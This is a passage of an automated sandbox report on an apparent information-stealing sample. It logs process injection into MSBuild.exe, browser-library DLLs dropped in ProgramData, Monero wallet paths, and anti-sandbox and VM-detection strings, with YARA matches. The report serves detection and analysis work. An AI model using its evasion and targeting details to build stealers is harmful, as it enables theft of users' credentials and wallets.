                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rstrtmgr.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sxs.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mozglue.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvcp140.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: appresolver.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: bcp47langs.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: slc.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sppc.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: apphelp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pcacli.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mpr.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sfc_os.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.fileexplorer.common.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntshrui.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: linkinfo.dll
                          Source: C:\ProgramData\CBFCFBFBFB.exeSection loaded: apphelp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: webio.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                          Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
                          Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                          Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
                          Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2221135617.000000003823A000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2215082591.000000002C352000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                          Source: Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
                          Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418950 GetProcAddress (repeated),LoadLibraryA (9 times),GetProcAddress (repeated),4_2_00418950
                          Source: freebl3.dll.4.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.4.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.4.drStatic PE information: section name: .didat
                          Source: softokn3.dll.4.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.4.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066701A push ecx; ret 0_2_0066702D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006171D0 push ecx; ret 0_2_006171E3
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006673E8 push cs; ret 0_2_006673E9
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006673B8 push esp; retn 0003h0_2_006673BD
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006699ED push 0000004Ch; iretd 0_2_006699FE
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00655C8D push ecx; ret 0_2_00655CA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0042F142 push ecx; ret 4_2_0042F155
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00422D3B push esi; ret 4_2_00422D3D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041DDB5 push ecx; ret 4_2_0041DDC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00432715 push 0000004Ch; iretd 4_2_00432726
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8BB536 push ecx; ret 4_2_6C8BB549
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B6686B push edx; ret 13_2_00B66873
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF71D0 push ecx; ret 13_2_00AF71E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\CBFCFBFBFB.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: Yara matchFile source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
                          Source: c:\users\user\desktop\file.exeEvent Logs and Signature results: Application crash and keyboard check
                          Source: file.exe, MSBuild.exeBinary or memory string: DIR_WATCH.DLL
                          Source: file.exe, MSBuild.exeBinary or memory string: SBIEDLL.DLL
                          Source: file.exe, MSBuild.exeBinary or memory string: API_LOG.DLL
                          Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,4_2_0040180D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeAPI coverage: 1.6 %
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 7.8 %
                          Source: C:\ProgramData\CBFCFBFBFB.exeAPI coverage: 1.7 %
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6052Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 4420Thread sleep count: 78 > 30Jump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh4_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062735B FindFirstFileExW,0_2_0062735B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,4_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0040CD37
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B0735B FindFirstFileExW,13_2_00B0735B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00410FBA GetSystemInfo,wsprintfA,4_2_00410FBA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: Amcache.hve.7.drBinary or memory string: VMware
                          Source: BFCGDA.4.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: AMC password management pageVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                          Source: BFCGDA.4.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                          Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: BFCGDA.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.0000000001373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: BFCGDA.4.drBinary or memory string: tasks.office.comVMware20,11696494690o
                          Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                          Source: BFCGDA.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: global block list test formVMware20,11696494690
                          Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: BFCGDA.4.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                          Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                          Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(=7
                          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                          Source: BFCGDA.4.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                          Source: BFCGDA.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                          Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: BFCGDA.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
